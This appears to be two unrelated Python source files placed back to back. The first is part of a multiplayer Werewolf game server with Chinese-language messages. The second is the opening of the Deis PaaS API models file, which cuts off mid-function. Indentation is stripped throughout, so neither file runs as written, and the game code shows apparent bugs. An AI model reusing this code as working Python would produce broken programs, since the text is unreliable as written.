- Hunter : `int`, optional, the number of hunters
- Guard : `int`, optional, the number of guards
- Idiot : `int`, optional, the number of idiots
The value of `Villager` and `Wolf` parameter should be **at least** 1, and values of the other parameters should be **at most** 1.
# Return
None
"""
self.identityList = []
assert "Villager" in kwargs, "The `Villager` parameter is required"
assert "Wolf" in kwargs, "The `Wolf` parameter is required"
for identity in kwargs:
assert identity in availableIdentity
if identity in uniqueIdentity:
assert kwargs[identity] <= 1, "There should be at most 1 " + identity
else:
assert kwargs[identity] >= 1, "There should be at least 1 " + identity
for i in range(kwargs[identity]):
# eval(identity) returns a class
self.identityList.append(eval(identity))
i + 1
shuffle(self.identityList)
def addPlayer(self, connection: socket.socket, data: ChunckedData):
"""
The server add a player to game after receiving a choose seat request.
# Parameter
- data: data packet received.
# Return
None
"""
assert self.running is False
assert data.type == 1 # The packet type must match
# `identityList` must be initialized
assert len(self.identityList) != 0
# Read the content of the packet
# Verify the seat is available
# Randomly allocate seat when the seat chosen is already taken
id = randint(1, self.playerCount)
while id in sorted(self.activePlayer.keys()):
id = randint(1, self.playerCount)
newplayer = self.identityList.pop()(id=id, connection=connection)
self.activePlayer[id] = newplayer
self.allPlayer[id] = newplayer
# Send response
identityCode: int = getIdentityCode(self.activePlayer[id])
# REVIEW: Print message here.
print("The player %d get the %d identity" % (id, identityCode))
packet: Dict[str, Any] = getBasePacket(
newplayer.server, newplayer.client)
packet["seat"] = id
packet["identity"] = identityCode
sendingThread: Thread = Thread(
target=ChunckedData(-1, **
packet).send, args=(self.activePlayer[id].socket,)
)
sendingThread.setDaemon(True)
sendingThread.start()
def electPolice(self):
"""
Implements the game logic before day. Workflow:
- Elect for police (only the first day)
- The candidate talks in sequence (only the first day)
- The candidate could not quit the election, which is different from the offline version.
- Vote for police (only the first day)
- If a wolf explodes in the election period, the server announces the victim and switch to night immediately. The vote is delayed to the next day. Explosion of another wolf at this time will make the police does not exist.
- If there are two or more candidates get the same vote, they are required to talk in sequence again. If two or more candidates get the same vote once again, the police does not exist in the game.
# Parameter
None
# Return
The police elected. If a wolf explodes, returns None.
"""
sleep(0.05)
# Ask for election
electionCandidate: List[Tuple[int, ReceiveThread]]
electionCandidate = [
(player, self.activePlayer[player].joinElection())
for player
in sorted(self.activePlayer.keys())
]
for player, recthread in electionCandidate:
recthread.join()
candidate: List[int] = []
for player, recthread in electionCandidate:
if recthread.getResult() is not None and \
recthread.getResult().content['action'] and \
recthread.getResult().content['target']:
candidate.append(player)
current: ReceiveThread
if not candidate or len(candidate) == len(self.activePlayer):
self.broadcast(None, "本局游戏没有警长")
return
elif len(candidate) == 1:
self.broadcast(None, "警长是%d号玩家" % (candidate[0], ))
self.activePlayer[candidate[0]].police = True
return
# Candidate talk in sequence
for i in range(2):
"""
Vote for the police
Loop variable: i - only a counter
"""
self.broadcast(
None,
"警长竞选候选人:" + "号玩家、".join([str(_) for _ in candidate]) + "号玩家"
)
for player in candidate:
sleep(0.05)
current = self.activePlayer[player].speak()
current.join()
if current.getResult() is not None:
self.broadcast(
player,
"%d号玩家发言:\t" % (player,) +
current.getResult().content['content']
)
# Ask for vote
voteThread: List[ReceiveThread] = []
thread2: Optional[ReceiveThread] = None
for player in sorted(self.activePlayer.keys()):
if player in candidate:
continue # Candidate cannot vote
thread2 = self.activePlayer[player].voteForPolice()
if thread2:
voteThread.append(thread2)
for thread in voteThread:
thread.join()
del thread2
# Get the result and count the vote
vote: List[int] = []
packetContent: Dict[str, Any] = {}
for thread in voteThread:
if thread.getResult() is not None:
packetContent = thread.getResult().content
else:
continue
# REVIEW for debugging
# print(packetContent)
if packetContent['vote'] and packetContent['candidate'] in candidate:
vote.append(packetContent['candidate'])
voteResult: Dict[int, float] = mergeVotingResult(vote)
self.broadcast(
None,
"投票结果:%s" % (
"、".join(
[
"%s号玩家%.1f票" % (player, vote)
for player, vote
in zip(
voteResult.keys(),
[voteResult[_] for _ in voteResult]
)
]
),
)
)
result: List[int] = getVotingResult(voteResult)
sleep(0.05)
del voteThread
del vote
del packetContent
del voteResult
if (len(result) == 1):
self.broadcast(None, "警长是%d号玩家" % (result[0], ))
self.activePlayer[result[0]].police = True
return None
elif i == 0:
self.broadcast(
None,
"需要第二次竞选,警长候选人为%s号玩家" % "号玩家、".join(
[str(_) for _ in result]
)
)
candidate.clear()
candidate, result = result, candidate
result.clear()
self.broadcast(None, "本局游戏没有警长")
sleep(0.05)
def victimSkill(self, isExplode: bool = False):
"""
After a player has died, the victim should take the following actions in sequence:
- If police dies, he should decide the next police.
- Anyone died during the day or the first night can have their last words.
- If the guard or the king of werewolves dies and not dying from the poison, he can kill a person at this time.
# Parameters
- isExplode: `bool`, when the victim is killed by white werewolf's explode, no last words.
"""
for id in self.victim:
victim = self.allPlayer[id]
print(victim)
retMsg = victim.onDead(
(self.night == 1 or self.day == self.night) and not isExplode,
default_timeout()
)
if retMsg[0] and retMsg[0].getResult() and \
retMsg[0].content['vote'] and \
retMsg[0].content['candidate'] in sorted(self.activePlayer.keys()):
self.activePlayer[retMsg[0].content['candidate']].police = True
if retMsg[1]:
self.broadcast(None, retMsg[1].content['content'])
if isinstance(victim, Hunter) or isinstance(victim, KingOfWerewolves):
if (self.hunterStatus and isinstance(victim, Hunter)) \
or (self.kingofwolfStatus and isinstance(victim, KingOfWerewolves)):
gunThread = victim.skill()
gunThread.join()
if gunThread.getResult() is not None:
packetContent: Dict[str, Any]
packetContent = gunThread.getResult().content
else:
break
if packetContent['action'] and packetContent['target'] in sorted(self.activePlayer.keys()):
self.broadcast(None, "玩家%d被玩家%d杀死"
% (packetContent['target'], id))
self.activePlayer[
packetContent['target']
].informDeath()
self.activePlayer.pop(packetContent['target'])
status = self.checkStatus()
if status != 0:
return status
self.allPlayer[
packetContent['target']
].onDead(True, default_timeout(None))
else:
victim.inform("你的选择无效")
else:
victim.inform("你由于女巫的毒药死亡而不能开枪")
for victim in self.victim:
self.activePlayer.pop(victim)
self.victim.clear()
def dayTime(self) -> int:
"""
Implements the game logic in daytime. Workflow:
- Announce the victim
- If the king of werewolves or the hunter is killed by the wolves, ask them
- If the police exists - randomly choose a side from the police
- If the police does not exist - randomly choose a side from the victim
- If no or two players died at night - randomly choose a side from the police (if exist)
- The player talks in sequence
- If a wolf explodes, the game switch to the night at once after the wolf talks.
- Vote for the victim
- If there are same vote, players with the same vote talk again and vote again. If the same situation appears again, there will be no victim in day.
- Announce the exile
- If the exile is an idiot not voted out before, it can escape from death. But the idiot can no longer vote.
# Return
An `int` integer, value falls in `-1`, `0` and `1`
- `-1`: The game stops and the werewoles win - either villagers or skilled villagers are eliminated
- `0`: The game continues
- `1`: The game stops and the villagers win - the wolves are eliminated
"""
# ANCHOR: Implement the game logic in daytime
sleep(0.05)
self.day += 1
self.broadcast(
None,
"天亮了\n目前在场的玩家:%s号玩家" % (
"号玩家、".join([str(_) for _ in sorted(self.activePlayer.keys())])
)
)
startpoint: int = 0
exile: List[int] = []
# announce the victim and check the game status
if len(self.victim) == 0:
self.broadcast(None, "公布死讯:昨晚是平安夜")
else:
self.broadcast(None, "公布死讯:昨晚死亡的玩家是%s号玩家" %
"号玩家、".join(str(s) for s in self.victim))
# ask if the victim want to use the skill
if len(self.victim) > 0:
for id in self.victim:
self.activePlayer[id].informDeath()
self.victimSkill()
status = self.checkStatus()
if status != 0:
return status
# ask the police (if exists) to choose the talking sequence
talkSequence: List[int] = []
isClockwise: bool = True
packetContent: Dict[str, Any] = {}
policeID: int = 0
for player in sorted(self.activePlayer.keys()):
"""
Find the police
"""
if self.activePlayer[player].police:
policeID = player
startpoint = self.victim[0] \
if len(self.victim) == 1 \
else (policeID if policeID else min(self.activePlayer.keys()))
# Police choose the direction
if policeID:
police = self.activePlayer[policeID]
policeThread = police.policeSetseq()
policeThread.join()
isClockwise = policeThread.getResult().content['target'] \
if policeThread.getResult() is not None \
else True
talkSequence: List[int] = self.setSeq(startpoint, isClockwise)
exile: List[int] = []
# active player talk in sequence
policeVoteThread: Optional[ReceiveThread] = None
policeVote: Optional[int] = None
for i in range(2):
"""
Vote for the exile
Loop variable: i - only a counter
"""
for id in talkSequence:
if id not in exile:
sleep(0.05)
player = self.activePlayer[id]
current = player.speak()
current.join()
self.broadcast(
player, "%d号玩家发言:\t" % (id,) + current.getResult().content['content'])
# Ask for vote
voteThread: List[ReceiveThread] = []
for id in sorted(self.activePlayer.keys()):
if isinstance(self.activePlayer[id], Idiot) and self.activePlayer[id].used:
"""
An idiot cannot vote
"""
continue
if id != policeID:
voteThread.append(self.activePlayer[id].vote())
else:
policeVoteThread = self.activePlayer[id].vote()
for thread in voteThread:
thread.join()
if policeVoteThread is not None:
policeVoteThread.join()
if policeVoteThread is not None and policeVoteThread.getResult() is not None:
packetContent = policeVoteThread.getResult().content
if packetContent['vote'] and packetContent['candidate'] in sorted(self.activePlayer.keys()):
policeVote = packetContent['candidate']
# Get the result and count the vote
vote: List[int] = []
packetContent: Dict[str, Any] = {}
for thread in voteThread:
if thread.getResult() is None:
continue
packetContent = thread.getResult().content
if packetContent['vote'] and packetContent['candidate'] in sorted(self.activePlayer.keys()):
vote.append(packetContent['candidate'])
voteResult: Dict[int, float] = mergeVotingResult(vote, policeVote)
self.broadcast(
None,
"投票结果:%s" % (
"、".join(
[
"%s号玩家%.1f票" % (player, vote)
for player, vote
in zip(
voteResult.keys(),
[voteResult[_] for _ in voteResult]
)
]
),
)
)
result: List[int] = getVotingResult(voteResult)
# REVIEW for debugging
# print(vote)
# print(result)
del voteThread
del vote
del packetContent
del voteResult
exile.clear()
if (len(result) == 1):
"""
Check the identity of the exiled. Idiot can escape from dying.
"""
if not isinstance(self.activePlayer[result[0]], Idiot) or self.activePlayer[result[0]].used:
self.broadcast(
None, "被放逐的玩家是%d号玩家" % (result[0],)
)
exile.append(result[0])
else:
self.activePlayer[result[0]].used = 1
self.broadcast(None, "%d号玩家是白痴" % (result[0],))
break
elif i == 0:
self.broadcast(
None,
"需要另一次投票,投票候选人为%s号玩家" % "号玩家、".join(
[str(_) for _ in result]
)
)
exile, result = result, exile
# announce the exile and check the game status
if len(exile) == 0:
self.broadcast(None, "没有人被放逐")
else:
del self.activePlayer[exile[0]]
self.victim.clear()
self.victim.extend(exile)
for id in self.victim:
if id in sorted(self.activePlayer.keys()):
self.activePlayer.pop(id)
status = self.checkStatus()
if status:
return status
# ask if the victim want to use the skill
while self.victim: # 极端情况可能会开两次枪
for id in self.victim:
self.allPlayer[id].informDeath()
self.victimSkill()
status = self.checkStatus()
return status
def setSeq(self, startpoint: int, clockwise: bool) -> List[int]:
"""
- startpoint: the person id to start with
- clockwise: True means clockwise, False means anti-clockwise
- return: seq: list[int]
"""
seq, keys = [], list(sorted(self.activePlayer.keys()))
tempStart, tempEnd = [], []
cur = tempStart
if clockwise:
keys.reverse()
for id in keys:
cur.append(id)
if id == startpoint:
cur = tempEnd
tempStart.reverse()
tempEnd.reverse()
seq = tempStart + tempEnd
seq.reverse()
return seq
def nightTime(self):
"""
Implements the game logic at night. Workflow:
- Wolves wake up to kill a person. The server should inform a player his peers.
- The witch wakes up to kill a person or save a person
- After the witch has saved a person, it would no longer knows the victim at night
- The witch can only use a bottle of potion at night.
- The witch can only save herself in the first night.
- The predictor wakes up and check the identity of another player.
- The guard wakes up, choose to guard a player at night.
- The guard cannot guard a player in two consecutive nights.
- The hunter wakes up. The server inform the skill status. (If not killed by the witch)
"""
sleep(0.05)
self.night += 1
self.broadcast(
None,
"天黑请闭眼\n目前在场的玩家:%s号玩家" % (
"号玩家、".join([str(_) for _ in sorted(self.activePlayer.keys())])
)
)
# Parameters:
victimByWolf: int = 0
victimByWitch: int = 0
predictorTarget: int = 0
guardTarget: int = 0
# ANCHOR: Wolves wake up
# Vote for a player to kill
wolves = []
for player in sorted(self.activePlayer.keys()):
if isinstance(self.activePlayer[player], Wolf):
wolves.append(player)
for wolf in wolves:
self.activePlayer[wolf].inform(
"目前在场的狼人:" + "号玩家、".join([str(_) for _ in wolves]) + "号玩家"
)
wolfThread: List[KillableThread] = []
sleep(0.5)
for player in sorted(self.activePlayer.keys()):
if isinstance(self.activePlayer[player], (Wolf, KingOfWerewolves, WhiteWerewolf)):
ret: Optional[KillableThread] = KillableThread(
self.activePlayer[player].kill, **{}
)
ret.setDaemon(True)
ret.start()
if ret is not None:
wolfThread.append(ret)
if wolfThread: # Only used for indention
temp: List[ReceiveThread] = []
for thread in wolfThread:
thread.join()
if thread.getResult():
temp.append(thread.getResult())
for thread in temp:
thread.join()
vote: List[int] = []
packetContent: Dict[str, Any] = {}
for thread in temp:
if thread.getResult() is None:
continue
packetContent = thread.getResult().content
if packetContent['action'] and packetContent['target'] in sorted(self.activePlayer.keys()):
vote.append(packetContent['target'])
result: Any = mergeVotingResult(vote)
result = getVotingResult(result)
# If there are more than 1 victim, randomly choose one
shuffle(result)
victimByWolf = result[0] if result else 0
del vote
del packetContent
del result
del temp
del wolfThread
if self.explode is not None:
self.activePlayer[self.explode].informDeath()
self.activePlayer.pop(self.explode)
self.explode = None
# ANCHOR: Predictor wake up
# The predictor ask for a player's identity
predictorThread: Optional[ReceiveThread] = None
predictor: Optional[Predictor] = None
for player in sorted(self.activePlayer.keys()):
if isinstance(self.activePlayer[player], Predictor):
predictor = self.activePlayer[player]
predictorThread = self.activePlayer[player].skill()
if predictorThread:
predictorThread.join()
if predictor is not None and predictorThread is not None and predictorThread.getResult() is not None:
packetContent: Dict[str, Any] = predictorThread.getResult().content
if packetContent['action'] and packetContent['target'] in sorted(self.activePlayer.keys()):
predictorTarget = packetContent['target']
# Notice: the server need to send a response here, and the packet type is -3
# The 'action' field is the identity of the target.
packetContent.update(**predictor._getBasePacket())
packetContent['action'] = getIdentityCode(
self.activePlayer[predictorTarget]) >= 0
packetContent['target'] = -1024
sendingThread: Thread = Thread(
target=ChunckedData(-3, **packetContent).send,
args=(predictor.socket, ),
daemon=True
)
sendingThread.start()
del packetContent
del predictorThread
# ANCHOR: Witch wake up
# Witch can save or kill a person
witchThread: Optional[ReceiveThread] = None
witch: Optional[Witch] = None
for player in sorted(self.activePlayer.keys()):
if isinstance(self.activePlayer[player], Witch):
witch = self.activePlayer[player]
witchThread = witch.skill(
killed=victimByWolf
)
if witchThread:
witchThread.join()
if witch is not None and witchThread is not None and witchThread.getResult() is not None:
"""
Got the response
"""
packetContent: Dict[int, Any] = witchThread.getResult().content
if packetContent['action']:
"""
If the witch takes the action
"""
if packetContent['target'] == 0 or \
not isinstance(self.activePlayer[packetContent['target']], Witch) or \
self.night == 0:
"""
The witch cannot save herself after the first night.
"""
if packetContent['target'] == 0 and witch.used % 2 == 0:
victimByWolf *= -1 # wait for guard
witch.used += 1
elif packetContent['target'] in sorted(self.activePlayer.keys()) and witch.used < 2:
victimByWitch = packetContent['target']
witch.used += 2
del packetContent
del witchThread
# ANCHOR: Guard wake up
# Guard protects a player, prevent him from dying from wolves.
guardThread: Optional[ReceiveThread] = None
guard: Optional[Guard] = None
for player in sorted(self.activePlayer.keys()):
if isinstance(self.activePlayer[player], Guard):
guard = self.activePlayer[player]
guardThread = self.activePlayer[player].skill()
if guardThread:
guardThread.join()
if guard is not None and guardThread is not None and guardThread.getResult is not None:
packetContent: dict = guardThread.getResult().content
if packetContent['action']:
if packetContent['target'] in sorted(self.activePlayer.keys()):
guardTarget = packetContent['target']
# Cannot save the same player in 2 days.
if (guardTarget != self.guardedLastNight):
victimByWolf *= -1 if guardTarget ** 2 == victimByWolf ** 2 else 1
# the situation when guard and save the same person
del packetContent
del guardThread
# ANCHOR: Hunter wake up
# The server checks the usablity of the skill
if victimByWitch in sorted(self.activePlayer.keys()):
self.hunterStatus = not isinstance(
self.activePlayer[victimByWitch], Hunter
)
self.kingofwolfStatus = not isinstance(
self.activePlayer[victimByWitch], KingOfWerewolves
)
# ANCHOR: Return the value
self.victim.clear()
if victimByWitch in sorted(self.activePlayer.keys()):
self.victim.append(victimByWitch)
if victimByWolf in sorted(self.activePlayer.keys()):
self.victim.append(victimByWolf)
shuffle(self.victim)
if self.guardedLastNight != guardTarget:
self.guardedLastNight = guardTarget
else:
self.guardedLastNight = 0
self.night += 1
def broken(self, id: int):
"""
Process the self-explosion
"""
assert isinstance(self.activePlayer[id], Wolf)
if isinstance(self.activePlayer[id], KingOfWerewolves):
self.kingofwolfStatus = False
sendingThreads: List[Thread] = []
for i in self.activePlayer:
"""
Inform all players, including the player sends the message
"""
packetContent = self.activePlayer[i]._getBasePacket()
packetContent["id"] = id
sendingThreads.append(Thread(
target=ChunckedData(9, **packetContent).send,
args=(self.activePlayer[i].socket, ),
daemon=True
))
for thread in sendingThreads:
thread.start()
if isinstance(self.activePlayer[id], WhiteWerewolf):
"""
Kill someone
"""
recvThread: ReceiveThread = self.activePlayer[id].skill()
recvThread.join()
if recvThread.getResult() is not None:
packetRecv = recvThread.getResult()
if packetRecv['action'] and packetRecv['target'] in self.activePlayer:
self.broadcast(
None,
"白狼王%d号玩家带走%d号玩家" % (id, packetRecv['target'])
)
self.victim.clear()
self.victim.append(packetRecv['target'])
self.victimSkill(True)
self.explode = id # 等待下一晚nightTime()函数执行完毕后死亡
def launch(self):
"""
Launch the game
"""
assert self.running, "The game must be activated!"
while not self.status:
self.nightTime()
if self.day == 0:
self.electPolice()
explodeListenerv4 = socket.socket(AF_INET, SOCK_STREAM)
explodeListenerv6 = socket.socket(AF_INET6, SOCK_STREAM)
explodeListenerv4.bind((self.ipv4, self.port + 1))
explodeListenerv6.bind((self.ipv6, self.port + 1))
explodeListenerv4.listen(5)
explodeListenerv6.listen(5)
dayTimeThread = KillableThread(self.dayTime)
explodeThreadv4 = KillableThread(explodeListenerv4.accept)
explodeThreadv6 = KillableThread(explodeListenerv6.accept)
dayTimeThread.setDaemon(True)
explodeThreadv4.setDaemon(True)
explodeThreadv6.setDaemon(True)
explodeThreadv4.start()
explodeThreadv6.start()
dayTimeThread.start()
while dayTimeThread.is_alive():
"""
Listen for message
"""
if explodeThreadv4.is_alive() and explodeThreadv6.is_alive():
continue
c: socket.socket
addr: Tuple[Any]
if explodeThreadv4.is_alive() == False and explodeThreadv4.getResult():
c, addr = explodeThreadv4.getResult()
explodeThreadv6.kill()
else:
c, addr = explodeThreadv6.getResult()
explodeThreadv4.kill()
listenThread: ReceiveThread = ReceiveThread(c, 60)
listenThread.setDaemon(True)
listenThread.start()
listenThread.join()
curPacket = listenThread.getResult()
if curPacket is None:
continue
assert curPacket.type == 9
self.explode = curPacket['id']
dayTimeThread.kill()
self.broken(curPacket['id'])
c.close()
break
if explodeThreadv4.is_alive():
explodeThreadv4.kill()
if explodeThreadv6.is_alive():
explodeThreadv6.kill()
explodeListenerv4.close()
explodeListenerv6.close()
self.announceResult(self.status == 1)
self.broadcast(
None,
"本局游戏村民获胜" if self.status == 1 else "本局游戏狼人获胜"
)
for player in self.allPlayer:
self.allPlayer[player].socket.close()
class IncomingConnection(KillableThread):
"""
Create a thread that receives a handshake package.
`Establish` packets and `EstablishResp` packets are no longer used. The server sends the port information in this packet.
"""
def __init__(self, connection: socket.socket, dest: Game):
super(IncomingConnection, self).__init__(connection.accept)
self.socket = connection
self.game: Game = dest
self.pending: bool = False
def run(self):
while self.game.playerCount != len(self.game.activePlayer):
# REVIEW for debugging
# print("Listening for additional player...")
self.pending = True
c, addr = self.socket.accept()
self.pending = False
# REVIEW for debugging
# print(c.getpeername())
# print(c.getsockname())
# print("Client connected")
self.game.addPlayer(c, _recv(c))
|
models.py | # -*- coding: utf-8 -*-
"""
Data models for the Deis API.
"""
from __future__ import unicode_literals
import etcd
import importlib
import logging
import os
import re
import subprocess
import time
import threading
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.exceptions import ValidationError
from django.db import models
from django.db.models import Count
from django.db.models import Max
from django.db.models.signals import post_delete, post_save
from django.dispatch import receiver
from django.utils.encoding import python_2_unicode_compatible
from django_fsm import FSMField, transition
from django_fsm.signals import post_transition
from docker.utils import utils
from json_field.fields import JSONField
import requests
from rest_framework.authtoken.models import Token
from api import fields
from registry import publish_release
from utils import dict_diff, fingerprint
logger = logging.getLogger(__name__)
def log_event(app, msg, level=logging.INFO):
msg = "{}: {}".format(app.id, msg)
logger.log(level, msg) # django logger
app.log(msg) # local filesystem
def validate_app_structure(value):
"""Error if the dict values aren't ints >= 0."""
try:
for k, v in value.iteritems():
if int(v) < 0:
raise ValueError("Must be greater than or equal to zero")
except ValueError, err:
raise ValidationError(err)
def validate_comma_separated(value):
"""Error if the value doesn't look like a list of hostnames or IP addresses
separated by commas.
"""
if not re.search(r'^[a-zA-Z0-9-,\.]+$', value):
raise ValidationError(
"{} should be a comma-separated list".format(value))
def validate_domain(value):
"""Error if the domain contains unexpected characters."""
if not re.search(r'^[a-zA-Z0-9-\.]+$', value):
raise ValidationError('"{}" contains unexpected characters'.format(value))
class AuditedModel(models.Model):
"""Add created and updated fields to a model."""
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
"""Mark :class:`AuditedModel` as abstract."""
abstract = True
class UuidAuditedModel(AuditedModel):
"""Add a UUID primary key to an :class:`AuditedModel`."""
uuid = fields.UuidField('UUID', primary_key=True)
class Meta:
"""Mark :class:`UuidAuditedModel` as abstract."""
abstract = True
@python_2_unicode_compatible
class App(UuidAuditedModel):
"""
Application used to service requests on behalf of end-users
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
id = models.SlugField(max_length=64, unique=True)
structure = JSONField(default={}, blank=True, validators=[validate_app_structure])
class Meta:
permissions = (('use_app', 'Can use app'),)
def __str__(self):
return self.id
def _get_scheduler(self, *args, **kwargs):
module_name = 'scheduler.' + settings.SCHEDULER_MODULE
mod = importlib.import_module(module_name)
return mod.SchedulerClient(settings.SCHEDULER_TARGET,
settings.SCHEDULER_AUTH,
settings.SCHEDULER_OPTIONS,
settings.SSH_PRIVATE_KEY)
_scheduler = property(_get_scheduler)
@property
def url(self):
return self.id + '.' + settings.DEIS_DOMAIN
def log(self, message):
"""Logs a message to the application's log file.
This is a workaround for how Django interacts with Python's logging module. Each app
needs its own FileHandler instance so it can write to its own log file. That won't work in
Django's case because logging is set up before you run the server and it disables all
existing logging configurations.
"""
with open(os.path.join(settings.DEIS_LOG_DIR, self.id + '.log'), 'a') as f:
msg = "{} deis[api]: {}\n".format(time.strftime(settings.DEIS_DATETIME_FORMAT),
message)
f.write(msg.encode('utf-8'))
def create(self, *args, **kwargs):
"""Create a new application with an initial config and release"""
config = Config.objects.create(owner=self.owner, app=self)
Release.objects.create(version=1, owner=self.owner, app=self, config=config, build=None)
def delete(self, *args, **kwargs):
"""Delete this application including all containers"""
for c in self.container_set.exclude(type='run'):
c.destroy()
self._clean_app_logs()
return super(App, self).delete(*args, **kwargs)
def _clean_app_logs(self):
"""Delete application logs stored by the logger component"""
path = os.path.join(settings.DEIS_LOG_DIR, self.id + '.log')
if os.path.exists(path):
os.remove(path)
def scale(self, user, structure): # noqa
"""Scale containers up or down to match requested structure."""
if self.release_set.latest().build is None:
raise EnvironmentError('No build associated with this release')
requested_structure = structure.copy()
release = self.release_set.latest()
# test for available process types
available_process_types = release.build.procfile or {}
for container_type in requested_structure.keys():
if container_type == 'cmd':
continue # allow docker cmd types in case we don't have the image source
if container_type not in available_process_types:
raise EnvironmentError(
'Container type {} does not exist in application'.format(container_type))
msg = '{} scaled containers '.format(user.username) + ' '.join(
"{}={}".format(k, v) for k, v in requested_structure.items())
log_event(self, msg)
# iterate and scale by container type (web, worker, etc)
changed = False
to_add, to_remove = [], []
for container_type in requested_structure.keys():
containers = list(self.container_set.filter(type=container_type).order_by('created'))
# increment new container nums off the most recent container
results = self.container_set.filter(type=container_type).aggregate(Max('num'))
container_num = (results.get('num__max') or 0) + 1
requested = requested_structure.pop(container_type)
diff = requested - len(containers)
if diff == 0:
continue
changed = True
while diff < 0:
c = containers.pop()
to_remove.append(c)
diff += 1
while diff > 0:
# create a database record
c = Container.objects.create(owner=self.owner,
app=self,
release=release,
type=container_type,
num=container_num)
to_add.append(c)
container_num += 1
diff -= 1
if changed:
if to_add:
self._start_containers(to_add)
if to_remove:
self._destroy_containers(to_remove)
# save new structure to the database
vals = self.container_set.values('type').annotate(Count('pk')).order_by()
self.structure = {v['type']: v['pk__count'] for v in vals}
self.save()
return changed
def _start_containers(self, to_add):
"""Creates and starts containers via the scheduler"""
create_threads = []
start_threads = []
for c in to_add:
create_threads.append(threading.Thread(target=c.create))
start_threads.append(threading.Thread(target=c.start))
[t.start() for t in create_threads]
[t.join() for t in create_threads]
if set([c.state for c in to_add]) != set([Container.CREATED]):
err = 'aborting, failed to create some containers'
log_event(self, err, logging.ERROR)
raise RuntimeError(err)
[t.start() for t in start_threads]
[t.join() for t in start_threads]
if set([c.state for c in to_add]) != set([Container.UP]):
err = 'warning, some containers failed to start'
log_event(self, err, logging.WARNING)
def _destroy_containers(self, to_destroy):
"""Destroys containers via the scheduler"""
destroy_threads = []
for c in to_destroy:
destroy_threads.append(threading.Thread(target=c.destroy))
[t.start() for t in destroy_threads]
[t.join() for t in destroy_threads]
[c.delete() for c in to_destroy if c.state == Container.DESTROYED]
if set([c.state for c in to_destroy]) != set([Container.DESTROYED]):
err = 'aborting, failed to destroy some containers'
log_event(self, err, logging.ERROR)
raise RuntimeError(err)
def deploy(self, user, release, initial=False):
"""Deploy a new release to this application"""
existing = self.container_set.exclude(type='run')
new = []
for e in existing:
n = e.clone(release)
n.save()
new.append(n)
# create new containers
threads = []
for c in new:
threads.append(threading.Thread(target=c.create))
[t.start() for t in threads]
[t.join() for t in threads]
# check for containers that failed to create
if len(new) > 0 and set([c.state for c in new]) != set([Container.CREATED]):
err = 'aborting, failed to create some containers'
log_event(self, err, logging.ERROR)
self._destroy_containers(new)
raise RuntimeError(err)
# start new containers
threads = []
for c in new:
threads.append(threading.Thread(target=c.start))
[t.start() for t in threads]
[t.join() for t in threads]
# check for containers that didn't come up correctly
if len(new) > 0 and set([c.state for c in new]) != set([Container.UP]):
# report the deploy error
err = 'warning, some containers failed to start'
log_event(self, err, logging.WARNING)
# destroy old containers
if existing:
self._destroy_containers(existing)
# perform default scaling if necessary
if initial:
self._default_scale(user, release)
def _default_scale(self, user, release):
"""Scale to default structure based on release type"""
# if there is no SHA, assume a docker image is being promoted
if not release.build.sha:
structure = {'cmd': 1}
# if a dockerfile exists without a procfile, assume docker workflow
elif release.build.dockerfile and not release.build.procfile:
structure = {'cmd': 1}
# if a procfile exists without a web entry, assume docker workflow
elif release.build.procfile and 'web' not in release.build.procfile:
structure = {'cmd': 1}
# default to heroku workflow
else:
structure = {'web': 1}
self.scale(user, structure)
def logs(self):
"""Return aggregated log data for this application."""
path = os.path.join(settings.DEIS_LOG_DIR, self.id + '.log')
if not os.path.exists(path):
raise EnvironmentError('Could not locate logs')
data = subprocess.check_output(['tail', '-n', str(settings.LOG_LINES), path])
return data
def run(self, user, command):
"""Run a one-off command in an ephemeral app container."""
# FIXME: remove the need for SSH private keys by using
# a scheduler that supports one-off admin tasks natively
if not settings.SSH_PRIVATE_KEY:
raise EnvironmentError('Support for admin commands is not configured')
if self.release_set.latest().build is None:
raise EnvironmentError('No build associated with this release to run this command')
# TODO: add support for interactive shell
msg = "{} runs '{}'".format(user.username, command)
log_event(self, msg)
c_num = max([c.num for c in self.container_set.filter(type='run')] or [0]) + 1
# create database record for run process
c = Container.objects.create(owner=self.owner,
app=self,
release=self.release_set.latest(),
type='run',
num=c_num)
image = c.release.image
# check for backwards compatibility
def _has_hostname(image):
repo, tag = utils.parse_repository_tag(image)
return True if '/' in repo and '.' in repo.split('/')[0] else False
if not _has_hostname(image):
image = '{}:{}/{}'.format(settings.REGISTRY_HOST,
settings.REGISTRY_PORT,
image)
# SECURITY: shell-escape user input
escaped_command = command.replace("'", "'\\''")
return c.run(escaped_command)
@python_2_unicode_compatible
class Container(UuidAuditedModel):
"""
Docker container used to securely host an application process.
"""
INITIALIZED = 'initialized'
CREATED = 'created'
UP = 'up'
DOWN = 'down'
DESTROYED = 'destroyed'
CRASHED = 'crashed'
ERROR = 'error'
STATE_CHOICES = (
(INITIALIZED, 'initialized'),
(CREATED, 'created'),
(UP, 'up'),
(DOWN, 'down'),
(DESTROYED, 'destroyed'),
(CRASHED, 'crashed'),
(ERROR, 'error'),
)
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
release = models.ForeignKey('Release')
type = models.CharField(max_length=128, blank=False)
num = models.PositiveIntegerField()
state = FSMField(default=INITIALIZED, choices=STATE_CHOICES,
protected=True, propagate=False)
def short_name(self):
return "{}.{}.{}".format(self.app.id, self.type, self.num)
short_name.short_description = 'Name'
def __str__(self):
return self.short_name()
class Meta:
get_latest_by = '-created'
ordering = ['created']
def _get_job_id(self):
app = self.app.id
release = self.release
version = "v{}".format(release.version)
num = self.num
job_id = "{app}_{version}.{self.type}.{num}".format(**locals())
return job_id
_job_id = property(_get_job_id)
def _get_scheduler(self):
return self.app._scheduler
_scheduler = property(_get_scheduler)
def _get_command(self):
try:
# if this is not procfile-based app, ensure they cannot break out
# and run arbitrary commands on the host
# FIXME: remove slugrunner's hardcoded entrypoint
if self.release.build.dockerfile or not self.release.build.sha:
return "bash -c '{}'".format(self.release.build.procfile[self.type])
else:
return 'start {}'.format(self.type)
# if the key is not present or if a parent attribute is None
except (KeyError, TypeError, AttributeError):
# handle special case for Dockerfile deployments
return '' if self.type == 'cmd' else 'start {}'.format(self.type)
_command = property(_get_command)
def clone(self, release):
c = Container.objects.create(owner=self.owner,
app=self.app,
release=release,
type=self.type,
num=self.num)
return c
@transition(field=state, source=INITIALIZED, target=CREATED, on_error=ERROR)
def create(self):
image = self.release.image
